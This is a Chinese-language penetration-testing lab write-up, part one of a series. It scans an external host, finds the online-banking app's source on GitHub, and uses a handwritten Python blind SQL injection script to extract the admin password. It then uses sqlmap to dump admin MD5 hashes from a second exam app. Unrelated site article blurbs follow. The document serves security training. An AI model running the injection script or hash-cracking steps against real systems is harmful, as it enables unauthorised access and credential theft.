域渗透之外网打点到三层内网(一)

简介: 域渗透之外网打点到三层内网

环境搭建

1.项目介绍:

本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。


2.VPS映射

1.将ip映射到公网。在公网vps使用配置frp工具的frps.ini 运行frps.exe -c frps.ini

2aff0ec2b0dbe1aced76b7368dc623c2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

在web1上配置frpc.ini 运行 frpc.exe -c frp.ini

dd65ff8741563403c989362e60eb6e0a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


成功访问到环境

http://x.x.x.x:8088/login.jsp

9de5ea9ad0c168b6ecb42561c0fb196f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

信息收集

1.端口探测

6a994d9f489dae1c449319e60bd2afce_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用nmap进行端口探测,发现4444、5003、8088、8899、8878端口开放。

b510f8c2db63cbbffd8bf2aa8d5feb80_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后查看其详细信息。

e151a6383e51daec8f3f999a57424ffb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.网站源代码查找

发现有一个网上银行系统。使用弱口令和暴力破解,没有爆破出弱口令用户。

fdbddc0fef68ed5c6e8a06f9d149b4c6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后就在github试试运气,发现了源码。

41858841ff4441dd0ca0e3f956bbb2d4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

源码地址:

https://github.com/amateur-RD/netBank-System

67a0b9e98f27dbb98d9d06f2bf6a6f08_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现了一个数据库文件,有一些普通用户和管理员用户的账户和密码。

d8cfcc0523e847d6ec5204aae0eb04d5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.SQL注入

然后进行登录测试,发现存在sql注入漏洞

edcf72c564e1611bfa927c4760765612_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

网上银行系统Hsql注入漏洞

bfc9119fcf25573463b9d6653c57e3ee_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用sqlmap不能进行跑出用户名和密码。

0e45c256824eb6863618e93358db8f6c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4.编写脚本进行sql注入

#coding:utf-8
import requests
password=""
url="http://x.x.x.x:8878/admin/login"
payload="0123456789abcdefghijklmnopqrstuvwxyz"
password=""
for i in range(1,20):
 for j in payload:
   exp = "admin' and(select substring(password,%s,1) from Admin) like '%s'
or '1'='" %(i,j)
   print("正在注入")
   data = {"admin.username": exp, "admin.password": 'aaaa', "type": 1}
   req = requests.post(url=url, data=data);
   if "密码不正确" in req.text:
     password+=j
     break
print(password)

成功跑出密码。然后进行登录。

391503681959472764b2ad92b5b62fba_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

登录之后,寻找文件上传或者可以获取到webshell的地方,发现没有可利用点。

d06c2d4490b3ff87bc66da682901d163_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5.tomexam SQL注入漏洞

在另一个地址处,发现可以注册用户。然后注册用户进行登录。

3b210cabaeb3928ac45e94338f417b20_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

登录之后发现,某处存在sql注入。

634c041aa3d03553a067dcfeaf8c394d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

6b6950baa039d2828ef498a451a43e0d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用sqlmap进行获取用户信息。

057ef2867bb314471cbf7fbc2bf66403_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

944fc8fce8c0b71466dc597d1e8ddb95_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

| 1  | 1      | 1399999999 | 1      | 超级管理员 | admin    | admin    | 17D03DA6474CE8BEB13B01E79F789E63       | 2022-04-09 00:14:08 | 301        |
| 6  | 2      |     | 1      |     | eu3      | eu3      | 4124DDEBABDF97C2430274823B3184D4 (eu3) | 2014-05-17 13:58:49 | 14


成功抓到了管理员用户和密码,然后使用md5进行解密。

c93f2d33fd14d4cc8c326f8eb5f805a5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功进行登录。登录之后没有找到可getshell的地方。

f1d8ee3cc8c9ca6371e64604f432aca6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



相关文章
|
数据可视化 前端开发 测试技术
软件需求分析实践——需求拆分| 学习笔记
快速学习软件需求分析实践——需求拆分
软件需求分析实践——需求拆分| 学习笔记
|
4月前
|
人工智能 自然语言处理 算法
2025年AI数字人一体机怎么选?4个关键指标帮你精准决策
AI数字人一体机助力政务、医疗、金融等领域智能化升级。选购需关注四大核心:交互能力、形象表现、内容管理、稳定售后。AI数字人一体机凭借成熟算法、定制化服务与国密级安全认证,提供开箱即用的高效解决方案,已实现多行业规模化落地,值得信赖
211 4
2025年AI数字人一体机怎么选?4个关键指标帮你精准决策
|
4月前
|
芯片 数据格式
STM32F103 驱动 WS281x 灯珠的三种方式详解(普通 IO / SPI+DMA / PWM+DMA)【开源免费】
本文详解STM32F103驱动WS281x灯珠的三种方法:普通IO模拟、SPI+DMA编码、PWM+DMA调占空比。对比时序精度、CPU占用与适用场景,推荐PWM+DMA为最优方案,并提供串口/CAN控制示例工程,助力高效实现LED控制。(239字)
STM32F103 驱动 WS281x 灯珠的三种方式详解(普通 IO / SPI+DMA / PWM+DMA)【开源免费】
|
消息中间件 负载均衡 监控
skynet框架:批量服务管理方案
【10月更文挑战第7天】Skynet 框架下的批量服务管理方案通过高效、可靠及可扩展的设计,实现了对大量服务实例的集中管理。该方案涵盖服务注册与发现、消息队列、负载均衡及集群管理等关键技术,确保系统稳定运行并提升响应速度。其优势在于提高系统性能、增强可靠性、便于扩展及简化管理操作,适用于大规模分布式系统、微服务架构、实时数据处理及游戏服务器等多种场景。通过定制化优化,可充分发挥 Skynet 框架的优势,构建高效稳定的分布式系统。
675 6
|
网络协议 开发工具 C#
RTSP协议探究和RTSP播放器技术实现
RTSP播放器可广泛应用于对延迟要求比较高的场景下,比如协同操控相关的智能机器人或无人机、实时视频监控、远程视频会议、网络电视等。通过控制信令实现对流媒体数据的远程控制和传输管理。
1517 0
|
Java API Spring
springBoot:注解&封装类&异常类&登录实现类 (八)
本文介绍了Spring Boot项目中的一些关键代码片段,包括使用`@PathVariable`绑定路径参数、创建封装类Result和异常处理类GlobalException、定义常量接口Constants、自定义异常ServiceException以及实现用户登录功能。通过这些代码,展示了如何构建RESTful API,处理请求参数,统一返回结果格式,以及全局异常处理等核心功能。
204 1
|
XML 传感器 机器人
Isaac Sim详细安装使用教程
NVIDIA Isaac Sim 4.0版本的安装和使用教程,包括了下载、安装、配置环境、使用ROS/ROS2扩展、设置工作空间以及编译和运行示例程序的步骤。同时,还提供了Isaac Sim的架构图和USD文件格式的介绍,以及相关的资源链接和教程视频。
5935 2
Isaac Sim详细安装使用教程
|
网络协议 安全 网络安全
常见的网络传输协议有几种
常见的网络传输协议涵盖多个层次,包括传输层(如TCP、UDP、SCTP)、应用层(如HTTP/HTTPS、FTP、SMTP、DNS、SSH)、网络层(如IP、ICMP、ARP)、数据链路层(如Ethernet、PPP、Wi-Fi)及安全协议(如SSL/TLS、IPSec)。这些协议各具特色,适用于不同场景,如TCP用于可靠传输,UDP适合实时应用,而HTTP/HTTPS则服务于网页浏览和数据交换。通过这些协议的协同工作,现代互联网和局域网得以实现多样化的应用和服务。
|
存储 BI Android开发
全开源仿第八区H5APP封装打包分发系统源码
全开源仿第八区H5APP封装打包分发系统源码
589 4
|
C语言
C语言8🔥:while循环与 do while 循环
C语言8🔥:while循环与 do while 循环
1915 0